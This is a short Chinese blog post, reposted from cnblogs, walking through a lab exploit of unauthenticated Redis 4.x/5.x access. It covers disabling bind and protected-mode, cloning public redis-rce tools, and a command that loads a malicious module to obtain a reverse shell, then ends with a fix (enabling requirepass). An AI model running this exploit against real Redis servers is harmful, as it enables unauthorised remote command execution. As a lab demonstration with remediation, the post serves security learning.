Redis 4.x 5.x 未授权访问

忘是亡心i 2021-11-19 15:20 268阅读 0赞

# 环境搭建 #

5.0版本下载

wget http://download.redis.io/releases/redis-5.0.5.tar.gz

tar xzf redis-5.0.0.tar.gz cd redis-5.0.5 make

## 修改配置文件运行远程访问 ##

1、将redis.conf文件中的bind 127.0.0.1 这行前面加注释(#)； 2、将redis.conf文件中的 protected-mode yes 改为no；

## 运行Redis ##

./redis-server /root/redis/redis-5.0.0/redis.conf

## 下载EXP ##

git clone [url]https://github.com/Ridter/redis-rce.git[/url]
    git clone [url]https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git[/url]

编译module.so文件：

![1675852-20190710180126123-986006671.png][]

将编译完的module.so复制到redis-rce目录下，然后执行以下命令：

![1675852-20190710180313264-572475419.png][]

python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f module.so

-r参数是指远程Redis IP地址； -L参数是指反弹到的服务器IP地址； 执行命令后，开启监听了本地的60720端口，并成功反弹回了shell。

![1675852-20190710181836471-870162542.png][]

# 修复建议 #

这是针对redis未授权访问的漏洞 这里直接redis.conf文件里面的  requirepass 参数取消注释   这里5.0是默认开启未授权访问的

![1675852-20190710181138800-1369825763.png][]

转载于:https://www.cnblogs.com/-zhong/p/11165655.html

[1675852-20190710180126123-986006671.png]: /images/20211119/e8e720fa57644c3fa292adb9d5666ca8.png
[1675852-20190710180313264-572475419.png]: /images/20211119/f10870d9390b4649aa6cefac85b3874c.png
[1675852-20190710181836471-870162542.png]: /images/20211119/af1474fc40644b048424bbf0b070dece.png
[1675852-20190710181138800-1369825763.png]: /images/20211119/b5f90a628ed0423396bbd61c395f8a95.png

发表评论取消回复

表情：

评论列表（有 0 条评论，268人围观）

还没有评论，来说两句吧...

相关阅读

相关 Solr新特性【4.x,5.x,6.x,7.x】

一.Solr4.x新特性　　1.近实时搜索　　　　Solr的近实时搜索【Near Real-Time，NRT】功能实现了文档添加到搜索的快速进行，以应对搜索快速...

青旅半醒/ 2024年04月20日 09:42/ 0 赞/ 27 阅读

相关当x满足( )时，|1.5x-0.5|+|2.5x-0.5|+|3.5x-0.5|+|4.5x-0.5|+|5.5x-0.5|+|6.5x-0.5|的值取得最小

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

偏执的太偏执、/ 2022年12月25日 11:50/ 0 赞/ 137 阅读

相关未授权访问漏洞——以redis为例

目录未授权漏洞的定义漏洞类型如何发现 redis redis介绍本地漏洞环境搭建(redi

小咪咪/ 2022年12月01日 01:13/ 0 赞/ 240 阅读

相关 Centos 5.x RHEL 5.x 安装salt升级Zmq2.x 到Zmq4.x

RHEL5.8通过EPEL源安装 salt-minion，启动的时候日志报错：\[WARNING \] You have a version of ZMQ less than

Myth丶恋晨/ 2022年08月14日 01:54/ 0 赞/ 129 阅读

相关 Redis未授权访问的漏洞

【漏洞概述】 Redis 默认情况下，会绑定在 0.0.0.0:6379，导致Redis服务暴露到公网上。如果在没有开启认证并且在任意用户可以访问目标服务器的情况下，从而

缺乏、安全感/ 2022年05月13日 06:40/ 0 赞/ 233 阅读

相关 mongodb未授权访问漏洞

catalogue 1. mongodb安装 2. 未授权访问漏洞 3. 漏洞修复及加固 4. 自动化检测点 1. mongodb安装

向右看齐/ 2022年03月30日 07:58/ 0 赞/ 534 阅读

相关 redis未授权访问漏洞利用

参考：[https://blog.csdn.net/guxiaoguo/article/details/78913245][https_blog.csdn.net_guxiao

缺乏、安全感/ 2021年12月04日 01:25/ 0 赞/ 350 阅读

相关 Redis 4.x 5.x 未授权访问

环境搭建 5.0版本下载 wget http://download.redis.io/releases/redis-5.0.5.tar.gz tar

忘是亡心i/ 2021年11月19日 15:20/ 0 赞/ 269 阅读

相关 redis 未授权访问利用两种方式

1、未授权访问漏洞 Redis在默认情况下，会绑定在0.0.0.0:6379，如果没有采用限制IP访问，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下，

不念不忘少年蓝@/ 2021年07月28日 17:32/ 0 赞/ 625 阅读

相关 redis 未授权访问详解

一. 应用介绍　　Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。和Memcached类似，它支持存

Dear 丶/ 2021年07月28日 15:13/ 0 赞/ 539 阅读